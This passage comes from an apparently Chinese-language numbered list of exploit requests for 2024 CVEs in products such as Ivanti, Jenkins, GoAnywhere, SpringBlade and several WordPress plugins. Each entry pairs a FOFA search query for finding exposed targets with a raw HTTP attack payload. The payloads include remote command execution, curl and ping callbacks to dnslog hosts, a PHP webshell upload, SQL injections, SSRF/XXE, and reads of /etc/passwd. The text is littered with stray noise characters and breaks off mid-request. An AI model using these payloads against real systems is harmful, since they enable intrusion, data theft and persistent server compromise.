' P9 k7 T' B, W3 I5 m1 cCVE-2024-01957 D3 Q: f& s, V8 V( W) a" f4 L
FOFA:app="SpiderFlow"
, y7 ^( \" L4 D0 fPOST /function/save HTTP/1.19 m; x& `4 `( R* R: ?
Host: 192.168.40.130:8088+ M( v( q& ~( h) ?, X! L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, o; M1 r3 u7 N0 o K: s7 e
Connection: close
3 G& i# u! j/ k" ^) ?* pContent-Length: 121
w3 q& g/ t6 u* D6 M6 H8 _Accept: */*
4 L, Z; d- q1 }) g1 H2 Z! Y' }Accept-Encoding: gzip, deflate7 h5 G# W E' c, w5 s! ~: j2 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' [4 q/ N; H2 G8 y% D& i& T0 l' _3 vContent-Type: application/x-www-form-urlencoded; charset=UTF-8
5 i) V$ p. r4 K4 a( _X-Requested-With: XMLHttpRequest1 i) F: o, t! x" B" E8 H, U
; |. \+ b \. Xid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
- [: f+ N1 ?: e/ F5 l% [5 |& A$ P# P8 b- i' L
% {6 Y( ~6 Y: G6 h: r* n' ?99. Ncast盈可视高清智能录播系统busiFacade RCE
; |7 C: I& q3 B* S. Q+ N2 \CVE-2024-0305
) C% z# a% E% I, w4 B* t- ?FOFA:app="Ncast-产品" && title=="高清智能录播系统"
4 I: c5 g+ D2 ^# E/ ?POST /classes/common/busiFacade.php HTTP/1.18 x# H' \. [" R6 M J3 g5 E% x1 |! w
Host: 192.168.40.130:8080, P3 F/ [6 f! d8 ^( R" Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 X1 V5 X, B% D3 Z6 J1 c6 cConnection: close
2 R: t7 ?/ r; Z, I2 oContent-Length: 154
$ m% C# |% y4 n, @# F* u/ uAccept: */*
7 x2 ^8 J4 [' j& Q) w; JAccept-Encoding: gzip, deflate
- J5 L9 c' _ g5 E2 g$ nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# e* T2 V' @) g7 f8 l7 T6 g+ r* ^Content-Type: application/x-www-form-urlencoded; charset=UTF-8& I+ K4 b5 I$ @$ o. J# d
X-Requested-With: XMLHttpRequest
4 M6 J P" t- ^% h3 `' a L. c5 D( U5 c, j T) I5 M
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
0 Y; R3 A @( C" I# v; {& L3 M
4 i- @# x/ c$ A( M9 d1 |0 V. i& m3 r3 a. G' N9 P2 \7 k7 |
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
- a. k# F$ z( n4 i6 ~6 ?' GCVE-2024-0352
" Y' C4 n3 p: T1 z) Q* u0 I. y+ kFOFA:icon_hash="874152924"; m/ P0 J! f4 `; x) S7 u* |( Q
POST /api/file/formimage HTTP/1.17 Z; h2 H% c, Z" F6 W5 J8 t
Host: 192.168.40.130
9 q& l. T7 L; q+ n4 ~6 d- HUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.368 M3 o. ^' d6 ^& o8 L, D9 t
Connection: close
+ E) M8 R" @; q& J4 x: o% U, h* c% mContent-Length: 201; J% P4 Y6 H" |& j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
! E* d5 J/ n( S. A1 JAccept-Encoding: gzip+ } p+ q6 q; R$ o
: B) E, Z4 A0 S* y: W) a------WebKitFormBoundarygcflwtei
/ l. ?2 _# r+ _Content-Disposition: form-data; name="file";filename="IE4MGP.php"
3 }7 I3 x. v& `* i; q7 X) \# B) N u$ ?Content-Type: application/x-php6 e; ~6 u6 b! g5 c
- p D6 F- G! u. V3 ?2ayyhRXiAsKXL8olvF5s4qqyI2O( r2 D5 h2 A8 j# |3 \8 j# s
------WebKitFormBoundarygcflwtei--3 g. i6 I& N b! f
0 g) }- N( z9 P2 Q! B
# l/ ~' c5 I6 u( O9 u( g101. ivanti policy secure-22.6命令注入& ^6 ]0 I- Q) T" E
CVE-2024-21887
, \2 w0 ?9 X4 L. P/ V" cFOFA:body="welcome.cgi?p=logo"+ m+ R0 E% u( W
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.12 P! T* D+ d/ v
Host: x.x.x.xx.x.x.x5 @/ n7 y+ j+ u8 D- D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( v3 v4 m, o. F0 t( vConnection: close
# Q4 o! e0 s, |Accept-Encoding: gzip
2 ]: R0 f! q) f* q% a5 h2 ?6 X% V" e/ }0 S
# U/ S+ }/ U* V9 t) X6 }1 F1 q102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 [8 x* x5 b+ ]2 p, b
CVE-2024-21893
# \2 W' A$ v+ \( o% m% o) U. _FOFA:body="welcome.cgi?p=logo"
/ W Y9 z% H1 X0 p" a5 i+ m G; |POST /dana-ws/saml20.ws HTTP/1.1
( U; ?( Q* E" JHost: x.x.x.x
2 z; h& ?- B: s1 e' b7 p& L' lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' B8 B& x' h0 K
Connection: close; v% Z2 ^) n) P% f. d
Content-Length: 792
6 b, W* M/ L- L3 eAccept-Encoding: gzip0 E6 j, e# `0 O; P/ _- t* r! d
3 b+ y4 `) w9 v `4 B7 z8 c: _
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope> B2 O5 ]0 w: h- p; o L
0 B- b" r4 q& J$ ~8 v
103. Ivanti Pulse Connect Secure VPN XXE
9 a% [( _8 V0 g: P: JCVE-2024-22024
+ s6 E: \( `7 }8 N/ a" @FOFA:body="welcome.cgi?p=logo"
9 C8 C+ q0 c3 r& p# XPOST /dana-na/auth/saml-sso.cgi HTTP/1.1* U8 K' G7 x" q) h0 n
Host: 192.168.40.130:111$ L$ [7 k# d5 Z1 G: v
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
2 K1 j9 ~' r0 X$ DConnection: close6 a: r. b# _! x I* i8 N; m
Content-Length: 204( `7 V# z( J: ?' r2 T& E) D' Y
Content-Type: application/x-www-form-urlencoded1 W1 c( D) i* [% Z5 p! C4 c0 Y
Accept-Encoding: gzip1 o3 l c; H3 O+ O1 d9 w5 P
" Q+ o! _4 c* f6 {( NSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==! O- X/ y4 V1 `+ m
& M+ j/ r' y, H- Z% m, j
) g+ a7 Q4 n3 `$ ?* X. q
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
" m' O, _6 S( h' g) t<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>8 j9 J% ]. |' u1 H8 X6 B5 T
. V6 C: G% v# @' Q, _1 c
5 s% J* k* N) s/ d" j104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 \( ^' _& z8 e) o, e4 [# y
CVE-2024-0569
, c. @$ ?, J( `3 R. ]; EFOFA:title="TOTOLINK", E/ v9 G" ]1 r* h4 a
POST /cgi-bin/cstecgi.cgi HTTP/1.1+ Y ~! L; E. W+ h3 W, l
Host:192.168.0.1
( J+ W6 d; v0 }! t' t/ BContent-Length:41* q- L; s& M' F4 `0 t! ]/ t
Accept:application/json,text/javascript,*/*;q=0.014 a' x5 g- i2 }0 K
X-Requested-with: XMLHttpRequest
2 @( Q' h- l2 _* Z5 J PUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
5 Z: F& Z: p$ z/ c. ]" p" wContent-Type: application/x-www-form-urlencoded:charset=UTF-8# E8 M+ _- q# b) [# [( T j
Origin: http://192.168.0.10 l# l% t: ]/ m4 \7 K% i
Referer: http://192.168.0.1/advance/index.html?time=1671152380564# o2 w: d- N7 J% A2 \1 c
Accept-Encoding:gzip,deflate
. L/ h o9 N* V3 v- U1 LAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
2 l/ L+ w6 c' N2 tConnection:close
4 Z: r( J2 s) U6 V
; o& F6 j7 F5 ~% ?( f{/ a2 S! e' i2 u
"topicurl":"getSysStatusCfg",
! ]# t9 I$ w) ? n7 F: _. O"token":""+ y5 `2 t3 {9 V& w. d' n
}6 ~9 Q6 L( E/ t; G2 @4 D% `% L
" h! b2 j* q+ x/ Q! B3 a2 l105. SpringBlade v3.2.0 export-user SQL 注入& I2 I0 I4 n# h2 L$ A
FOFA:body="https://bladex.vip"/ [3 N7 ~9 N2 e2 r9 X
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1$ R Y$ Q# A: G. H( a7 ^+ a+ K% |
, K* B5 ~- I5 U0 {106. SpringBlade dict-biz/list SQL 注入. V# t- d! j' c. y0 [ v/ c& T
FOFA:body="Saber 将不能正常工作"
+ g* G+ Y5 p" t4 h% S5 \ |. T4 aGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& _" H }# o! |# j' \; {5 E$ L
Host: your-ip6 Z @! _) a8 N v1 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 s) R' c# Q( r
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A1 _, x% B& Y2 m) o1 ]
Accept-Encoding: gzip, deflate) i6 |2 b8 q! A3 i- }0 O8 S
Accept-Language: zh-CN,zh;q=0.9
' V# H- F' W4 d7 _Connection: close( X/ E8 }6 |8 E; Y
& G* c7 M F/ A/ N
% M$ v( H J( W2 f5 m. T' {107. SpringBlade tenant/list SQL 注入+ l. @. H% f; G( @; w+ a
FOFA:body="https://bladex.vip"
" v3 n T! V: WGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
9 Y4 P, H- O. |: AHost: your-ip
& k* E. ?0 f- ^' k& |/ w1 q$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 ~ B' j" I: P) m+ Z
Blade-Auth:替换为自己的 U# r( m, B5 P6 k
Connection: close) P* N( w( h" g. P
4 K- I5 X$ Y: e) \( m* \( V
) S/ ~. T3 r. g
108. D-Tale 3.9.0 SSRF
7 e2 O) V5 J/ \CVE-2024-21642
$ X. g/ }, u4 ?6 ^, S7 zFOFA:"dtale/static/images/favicon.png"( l2 _2 }3 S; X8 W2 n4 b* @$ y
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1+ W6 b; m$ l& x! {
Host: your-ip
3 Y# n6 p; h) _" k3 zAccept: application/json, text/plain, */*0 {9 W& w, n: N& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 v- I0 v2 j' o7 bAccept-Encoding: gzip, deflate: d5 |& Z4 a! D3 {- ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& X+ Q% ~9 q0 [4 b% N! L3 qConnection: close
& H0 _# B" x$ O* T8 x! c
, T% F i; t% \2 t. j/ A+ o. x8 G2 W2 ^) X5 a
109. Jenkins CLI 任意文件读取
! ?4 B4 K. n" ], y, YCVE-2024-23897
6 E% r9 S; n0 Y+ ^5 wFOFA:header="X-Jenkins"
C/ b# G7 w; \# D5 q9 VPOST /cli?remoting=false HTTP/1.1
# K) F1 ] j' Q+ @4 w8 }/ A6 t" v! l0 b1 QHost:
# l5 Y) q7 K& [% U8 aContent-type: application/octet-stream
8 R6 {8 q( H0 z5 Q, Z$ HSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
) G4 O) H i7 U% N: a5 ~Side: upload
% q6 R. G7 P& E1 i6 MConnection: keep-alive; Z8 S( u4 J* h9 v7 S/ ~) b
Content-Length: 1630 H- V7 w; i$ A% E( }
6 R' ]1 G7 X6 K" R- m+ @ Z2 U% U, F
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 F$ D: ^4 x0 N: D2 q
* b+ \) `" }4 r+ {& l6 R0 A9 g: R* S( m
POST /cli?remoting=false HTTP/1.1
# a, u, ^% i* A: h6 ~, P% `Host:2 h( I; ~3 g: d
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 V A3 r$ j! Y2 x; D) N
download
2 g9 S+ @1 G" b- dContent-Type: application/x-www-form-urlencoded/ {# E: k# B9 L% ~% v
Content-Length: 00 f+ B3 z* ]! s
, i7 `& P% [8 T2 x D
4 }2 q7 }$ L, U. ^
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin7 s7 S9 x5 [; ] o# f
java -jar jenkins-cli.jar help
- P/ {& H2 V+ ~; o[COMMAND]
% Y, o8 k8 p8 T- BLists all the available commands or a detailed description of single command.
0 \* m) Y$ G2 r" v% T% A( E q" g( c COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
& }5 R; B$ R' o, O
" ?+ D/ x p% \1 {, ~- J* l! t8 B% E% p# n
110. Goanywhere MFT 未授权创建管理员+ {, I R3 z$ g( G
CVE-2024-02047 w$ T7 X: U% Z" y( M: @/ P9 K
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
$ w; @$ G$ a& g0 U1 w6 d nGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! F- c5 y$ a! @7 n; Q3 F
Host: 192.168.40.130:80002 H" R: e, t9 h: H
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.366 y8 `8 I" H, V" U* o
Connection: close7 t" ^0 V2 Y% F: h) j0 i+ o
Accept: */*
2 C- ], X& a0 q% [+ XAccept-Language: en
' w+ U" I* l$ m# u( o5 BAccept-Encoding: gzip2 B5 K1 L2 i- k2 A
7 K. t) ?3 l$ _4 u3 K' N; ?) W6 K0 C5 `) w/ ?
111. WordPress Plugin HTML5 Video Player SQL注入
& o) ~6 v/ g/ S: gCVE-2024-1061% F6 h2 F+ E* C# O
FOFA:"wordpress" && body="html5-video-player"
! Y2 v" \# R: T/ X. h' ZGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
' ] q9 q- H4 w$ a. THost: 192.168.40.130:112) e/ y* o: w( ^1 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 h2 e' J; [: l/ |& mConnection: close/ x) |3 T. l! Z, _
Accept: */*# q0 K% z2 R9 \% b x
Accept-Language: en( r8 ^9 s) M! K2 R
Accept-Encoding: gzip% {6 q' g" W: ~4 q. I1 B2 I9 G
9 l |7 f3 v" a8 A' S# X
" Q- A! f7 o* ?( R# u112. WordPress Plugin NotificationX SQL 注入6 V6 B) Z/ n! Z, ?- L4 M
CVE-2024-1698
% W6 n7 l2 ^" GFOFA:body="/wp-content/plugins/notificationx"# b% y( Q% ^& d
POST /wp-json/notificationx/v1/analytics HTTP/1.1( P% l) i: S& \1 A/ U0 w
Host: {{Hostname}}6 D. y; a5 Z- E
Content-Type: application/json, R5 t0 y! _( M0 ?( s
2 u9 S6 ~" u2 z o) k0 t{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- R- Q+ d7 ~$ ^. C0 Z" D) V a5 R
& S# L! i' i! x
113. WordPress Automatic 插件任意文件下载和SSRF
6 _& H; }2 R1 ?CVE-2024-27954( I: J8 l& e+ s) u
FOFA:"/wp-content/plugins/wp-automatic"" j* D: s4 R, C! g! {
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
4 o9 F V2 Y2 C7 C+ b1 W: e1 bHost: x.x.x.x7 }1 z' q0 F/ F o- z. Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
5 J. s4 @8 H" `3 c6 x* @/ V+ Y$ PConnection: close
9 v) Q7 P4 i! z: {: i' AAccept: */*
( a6 Z& y( a8 ]4 g+ V2 J" V+ vAccept-Language: en
' g1 C/ O. z: a, UAccept-Encoding: gzip, Q- g; n. H- c( f% J
8 V g; w! _" }* b5 S
9 N' {8 Y' H. p. {5 A( [114. WordPress MasterStudy LMS插件 SQL注入
4 n1 T+ E/ {0 T e; m% nFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
; n' R7 _9 Q4 j; \# z* ^GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1+ t2 R2 R/ f+ h* S. E/ c
Host: your-ip
& L, r' ]1 ]" S wUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
% Z* i$ P3 V, k/ t( }8 |Accept-Charset: utf-8, {& x; t' d0 z' Z. A
Accept-Encoding: gzip, deflate
% c& W6 g7 C& c. |) t, P2 eConnection: close
) _5 z0 j. j2 G8 ^( F
; |' M2 ^* f- l0 N# u9 a6 z0 B: c3 M/ ]: D1 g- g$ j
115. WordPress Bricks Builder <= 1.9.6 RCE
) ?* v; j: P4 b+ cCVE-2024-25600
; o5 k4 z. s7 C2 W: y& nFOFA: body="/wp-content/themes/bricks/"
) {8 K. f: p* a& D9 G第一步,获取网站的nonce值" o* r5 t& F! `+ r% [/ ?0 X# R
GET / HTTP/1.1
, H$ M+ r; _* T/ g. D) m" \Host: x.x.x.x; {$ P J; P# t# W+ D
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 \3 R' }1 j* k) Q: V$ J/ w1 ^' fConnection: close
" |! t- r+ v9 W; Q4 TAccept-Encoding: gzip
% X6 A: R3 M9 Q0 L- A# l
d2 o% ]! V7 w+ W/ v
# b6 d2 T2 ?8 w2 s* P第二步替换nonce值,执行命令$ g' B# ?5 _2 l1 m, f
POST /wp-json/bricks/v1/render_element HTTP/1.1) t' I& e+ p0 K- H/ K' L" _8 o
Host: x.x.x.x
2 j' e# R. U, _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; N: h+ I7 j U( O* PConnection: close, w T# c! M% _' G7 a$ \) U: w1 {; M1 ]- v
Content-Length: 356* F. c, H. p, w) B
Content-Type: application/json; g$ J! k% d+ s+ F; y6 b3 p( H
Accept-Encoding: gzip
/ X8 e; i2 t$ R/ R f/ g# I' W
5 m" U4 r1 U1 P/ Z7 B{" {7 ], F: y' C
"postId": "1",8 n4 Z$ }0 s; D
"nonce": "第一步获得的值",
0 Q$ `2 d. u- N" F' h) _ "element": {5 c4 N0 R% M( |8 p6 d
"name": "container",
. X- f, a: R: Q2 M$ Y1 p! E "settings": {) o$ w" {& p9 N9 s0 u# z
"hasLoop": "true",- R4 _; M {5 C1 d1 F' `
"query": {
3 [3 M7 ~) Q, L. _7 { D "useQueryEditor": true,9 S. X' I; \ ]
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",; _/ k! t; L$ @ d4 `9 v! |( [% w2 T
"objectType": "post"; R5 W9 {0 F' C
}
; c' p. F8 ~# W: U }: h$ w- q, Q7 M% ?' Y) s9 E' H* D
}
- X+ m6 K; J% i7 Y# c8 x6 j2 T6 {}
6 \+ s* q) e% |( U3 u% L
" m+ E4 V# U: T7 X+ V, @6 o: F U* f! A- ~, O: M6 N2 {
116. wordpress js-support-ticket文件上传) }* \+ K' i- C- _# Z2 d
FOFA:body="wp-content/plugins/js-support-ticket"3 i l' H5 |$ t! ^# Q5 s' ^
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1$ H0 X* o6 j. T3 A+ G/ O& U& a) g
Host:- d, G' ~. t& ]! p
Content-Type: multipart/form-data; boundary=--------767099171
# ?: ]7 D* p) p- t, EUser-Agent: Mozilla/5.00 h. ^! @- l2 {
2 n* Q- P) P6 a- K----------767099171
$ ~+ [' e: T H/ V7 }) G' z% R8 RContent-Disposition: form-data; name="action"
" v3 d0 t7 g7 ~; s7 F3 S. ?1 zconfiguration_saveconfiguration
( `0 E# R4 u6 x/ `" @. @/ J6 Y6 [----------767099171
$ K; Q; S# l) k5 x% _' TContent-Disposition: form-data; name="form_request"; L2 M/ r7 M, f% F+ B N! G
jssupportticket# t* V7 R4 A, K8 S# W& E
----------767099171* }- k% H4 i7 {
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 U( o3 L4 J# E' P% \2 L) g0 G" P
Content-Type: image/png w4 v- e1 Z: K0 v0 ~. v) o6 _
----------767099171--& l7 l' h3 I1 Z5 Y5 c" P6 X3 M5 K+ P
7 e1 O( @% y0 q v" }$ @$ U- j2 l) T) O
117. WordPress LayerSlider插件SQL注入
8 h. T5 X; \. q6 E' }* P5 rversion:7.9.11 – 7.10.0/ s4 L+ K3 U& s T* ?2 T
FOFA:body="/wp-content/plugins/LayerSlider/"
: ^1 m% w; T% i# i U' tGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
& |" r3 g$ p0 w* q) {, ^' ?Host: your-ip: |. h* p. a) m; }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% h; Q9 m" ?& r r4 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 m h1 \% _( D. _( C/ v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 }3 X N9 @ N8 {4 z+ V9 s* U: oAccept-Encoding: gzip, deflate, br
% _/ u3 M+ W: Y9 Y9 VConnection: close! b$ q8 u) N' A
Upgrade-Insecure-Requests: 17 y+ v' _( A! {' U& M& \
' a1 U9 b3 \ f5 X; a" P
4 o. f) {/ V; t# I* p* x118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
- L5 \* b3 I( j) PCVE-2024-0939$ M: L* q: p# }/ @7 h4 W
FOFA:title="Smart管理平台"
. U3 G1 Y& w+ YPOST /Tool/uploadfile.php? HTTP/1.1
8 k g Q" b4 R6 ?* u* yHost: 192.168.40.130:84434 ]& i9 Z# D+ u6 q
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8/ r. s; p4 {& ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
1 s/ g3 P* k+ I2 d' W9 F3 w+ QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ n6 |) t: z8 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ?# F. {' s4 i* zAccept-Encoding: gzip, deflate$ L7 N, a0 t4 t. I+ b1 A0 v. e
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
2 U2 O, t' q1 ]Content-Length: 405! G( z0 y% h n2 l
Origin: https://192.168.40.130:84439 c6 f5 ?. w+ [# {
Referer: https://192.168.40.130:8443/Tool/uploadfile.php& Q, {/ g |6 _$ L# O/ A. H
Upgrade-Insecure-Requests: 1" v2 {( s: O3 I$ f/ h1 x$ W
Sec-Fetch-Dest: document8 N& C3 ~3 Z" c) T8 H
Sec-Fetch-Mode: navigate `* S* k& Q$ L
Sec-Fetch-Site: same-origin
; d+ i( l7 F% i/ w( ?% d2 [% gSec-Fetch-User: ?1; d( }; T( `. ?! N
Te: trailers
! [0 K7 {. ]- P* S ]% E$ _Connection: close1 b% a$ E- y6 P0 o* F( T
0 `- f) f" K v6 W. W8 ?-----------------------------13979701222747646634037182887
# | j7 @- y1 n5 X2 I/ X' m, ]Content-Disposition: form-data; name="file_upload"; filename="contents.php"; _- h) z, q/ Y q& {% M$ T! v* t
Content-Type: application/octet-stream* e Z1 b E% j+ | K* d7 k a
" l: M7 s Q) u
<?php
% Q8 q) e5 B! g6 G X) t5 ~system($_POST["passwd"]);% W3 ?- p. o4 V
?>
( q/ F' ^( @4 R5 L; ]3 p! G-----------------------------13979701222747646634037182887
" i# H/ p8 w. ?Content-Disposition: form-data; name="txt_path"
! |0 z3 b3 e0 f9 n
1 n+ E7 P: `" o+ z: }- W6 |/home/src.php
' @( T! r3 g1 i3 n8 f-----------------------------13979701222747646634037182887--
9 t- B6 t; W/ I2 E* {3 |( r: H1 Q: _1 Y9 H8 l: i' e/ p0 t& I3 B
+ f' C5 b2 ]# c$ p' L访问/home/src.php; b% `* T" W) D
4 f, Z2 R# d! S {- g
119. 北京百绰智能S20后台sysmanageajax.php sql注入. l: O! h* y8 z4 s4 x
CVE-2024-1254. z. \5 x1 x$ d. i- |
FOFA:title="Smart管理平台"
! h$ k! u" N! V" T1 D h2 j0 |/ r% A先登录进入系统,默认账号密码为admin/admin
1 `9 p" t0 d( t6 RPOST /sysmanage/sysmanageajax.php HTTP/1.11
7 T( f- ^9 x2 Z" \& o- }Host: x.x.x.x+ t; _) T" ~5 }4 J0 { K1 N; F
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
5 z- P+ l, n- N5 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ _7 S9 u5 F/ P0 s& s; N/ s hAccept: */*) H! b: H5 _2 H* M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 d6 \2 V7 O% I' C9 V- C- x b' sAccept-Encoding: gzip, deflate
: Q( D, @+ j" O6 _) @+ |) CContent-Type: application/x-www-form-urlencoded;9 m( q7 Q* ~& D7 x$ R9 z6 ~
Content-Length: 109
* e0 ?/ D* o5 pOrigin: https://58.18.133.60:8443. W: }+ r# O# v9 E2 w- @6 K0 v4 D
